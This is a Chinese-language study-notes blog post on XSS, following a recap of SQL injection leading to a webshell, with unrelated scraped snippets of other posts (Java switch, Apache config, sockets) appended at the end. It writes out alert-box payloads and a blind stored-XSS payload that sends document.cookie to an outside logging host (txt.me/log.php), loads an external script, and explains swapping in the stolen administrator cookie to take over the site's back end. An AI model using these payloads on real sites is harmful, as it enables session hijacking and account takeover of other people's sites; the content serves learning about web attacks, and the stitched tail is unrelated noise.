11/28~11/29 学习内容

上一节课,我们通过SQL注入获取目标数据库中的数据,再通过获取帐户密码,进行爆破、后台路径成功地登录进入后台,再通过后台的文件上传漏洞,成功地获取网站的webshell,也就是获取了目标网站的权限。

今天我们讲XSS

XSS利用方式   攻击客户端  窃取用户信息   管理员

普通用户

SQL注入利用数据   提权  写文件提权

XSS常用的几个payload

<img/src=x>

<svg/onload=alert(1)>

<script>alert(1)<script>

第一种加载图片,后两种弹窗

<!--   注释的方式,容易造成页面混乱

比如像测试的一个网站,有个用户注册,我们通过修改信息达到弹窗的目的。而管理员只有在后台点开会员信息时,才会弹窗

这就是XSS盲打,所以说失败率还是挺高的,但是事情我们还是要去做

当我把我们的cookie改成管理员的cookie时,就相当于我们有管理员的权限了。

可以使用Editthiscookie

payload:new image().src ="http://domain.com/log.php?c=" + encodeURL(document.cookie);

JS的一个语法

document.cookie的内容如下

此时我们加上标签    <script>new image().src ="http:/txt.me/log.php?c=" + encodeURL(document.cookie);</script>

http:/txt.me/log.php?c=

我们这个域名下有个log.php的目录,后面有个参数c,假如我们随便输入一段内容,c=23333

那么这段内容会被存储到cookie.txt中

当我们插入xss的payload时,发现有字符串限制时怎么办呢

利用src  外部的Js脚本属性    <script src=//txt.me/1.js></script>

1.js就是我们上面字符串的内容

插入后,我们可以查看一下有没有成功

我们刚才进入了两次,成功记录了2次

我们可以对比一下是不是我们的cookie   查看Headers

当管理员在后台点击会员管理时,就会触发

然后我们获得管理员cookie后,开始替换

成功替换,刷新一下页面,此时我们就是管理员页面了

end

XSS平台的使用

未完待续

原文地址:https://www.cnblogs.com/geeklevi/p/11960645.html

时间: 2025-01-12 13:50:46

11/28~11/29 学习内容的相关文章

2015.7.29学习内容

2015.7.29学习内容 一.Switch选择结构 1.回顾 01.在Java中如何产生一个随机数 Math.random()    随机数范围:0到1,能取到0,取不到1 02.equals(): 在Java中,如果比较两个字符串用==的话,会出现错误,所以以后我们只要是对字符串类型进行对比,统一使用equals方法 2.Switch选择结构 Switch(char/int){ case 1: //语句 break; case 2: //语句2 break; default: //默认语句

11.28 限定某个目录禁止解析php;11.29 限制user_agent;11.30,11.31 php相关配置(上下)

扩展: apache开启压缩  http://www.aminglinux.com/bbs/thread-5528-1-1.html apache2.2到2.4配置文件变更  http://www.aminglinux.com/bbs/thread-7292-1-1.html apache options参数  http://www.aminglinux.com/bbs/thread-1051-1-1.html apache禁止trace或track防止xss  http://www.aming

11.28 限定某个目录禁止解析php;11.29 限制user_agent;11.30-11.31

扩展 : apache开启压缩 : http://ask.apelearn.com/question/5528 apache2.2到2.4配置文件变更 : http://ask.apelearn.com/question/7292 apache options参数 : http://ask.apelearn.com/question/1051 apache禁止trace或track防止xss : http://ask.apelearn.com/question/1045 apache 配置htt

11.28限定某个目录禁止解析php11.29限制user_agent11.30-31php相关配置

11.28 限定某个目录禁止解析php例如一些目录允许上传图片,为防止有人上传带有病毒php文件,所以禁止php解析,一般存放静态的文件上的目录是不允许解析PHP文件的重新加载配置文件 创建upload目录,访问提示403状态码在浏览器打开是无法打开的,连访问的机会都没有将下图的注释掉再重新加载后测试,这时候不能解析了,显示它的源代码在浏览器打开提示下载11.29 限制user_agentvim /usr/local/apache2.4/conf/extra/httpd-vhosts.conf重

11.28 限定某个目录禁止解析php 11.29 限制user_agent 11.30/11.31

11.28 限定某个目录禁止解析php 核心配置文件内容<Directory /data/wwwroot/www.123.com/upload>php_admin_flag engine off</Directory>curl测试时直接返回了php源代码,并未解析 curl -x127.0.0.1:80 'http://123.com/upload/123.php' 11.29 限制user_agent user_agent可以理解为浏览器标识核心配置文件内容<IfModul

2015.11.23 --- 2015.11.28 线性代数

这一周主要学习了一些内容,包括: 1)从感性认识上认识什么是线性代数,并且从思想上认识到线性代数是有用的. 2)简单的了解了矩阵的加,减,乘.这些都是一些人为规定的一些规则.掌握即可. 3)矩阵的逆,从基本的方法(余子式→代数余子式→伴随矩阵)和高斯方法来求解矩阵的逆. 4)讲了和矩阵相关的几个应用:包括线性方程组和向量的表达,并且从中,我们学习到了从不同的问题中抽象出问题的本质是一样的数学问题. 5)如果一个矩阵的逆是不存在或者是没有定义的,其原因是|A| = 0 . A的逆 = 1 / |A

2018.11.28 Android踩坑(读写文件)

在学到使用Android Device Monitor 查看文件的时候,发现Android Device Monitor在Android Studio里面找不到了,网上查了原来是被官方弃用了,现在通过命令行的方式启动 1.打开Project Structure找到sdk安装路径 2.找到这个路径打开里面tools文件夹下面的monitor.bat双击运行即可打开Android Device Monitor 虽然说找到了Android Device Monitor,但是打开报了个Could not

2017/9/5的学习内容___通过yield实现在单线程的情况下实现并发运算的效果

之前的学习内容,由于没有申请开通博客,就没有分享,今天想分享一下学习内容:通过yield实现在单线程的情况下实现并发运算的效果 采用的是经典的生产消费者模型 定义了两个函数 Consumer与Producer 关于生成器标志yield : 如果用__next__访问,只是单纯调用yield :如果是send访问,不仅可以访问yield,也可以给yield赋值! 需求:一个人造包子:两个人吃包子: 代码如下: 1 # -*- coding:utf-8 -*- 2 # Author : 何子辰 3

2017年8月9日学习内容存放 #socket通信介绍

2017年8月9日学习内容存放 1 #socket通信介绍 2 3 ''' 4 OSI七层 5 6 应用 7 表示 8 会话 9 传输 10 网络 ip 11 数据链路 mac 12 物理层 网线 13 14 15 16 http 17 smtp 18 dns 19 ftp 20 ssh 21 snmp 22 icmp ping 23 dhcp 24 25 26 27 发 send 28 收 receive 29 30 31 32 33 TCP/IP 三次握手,四次断开 34 35 UDP 36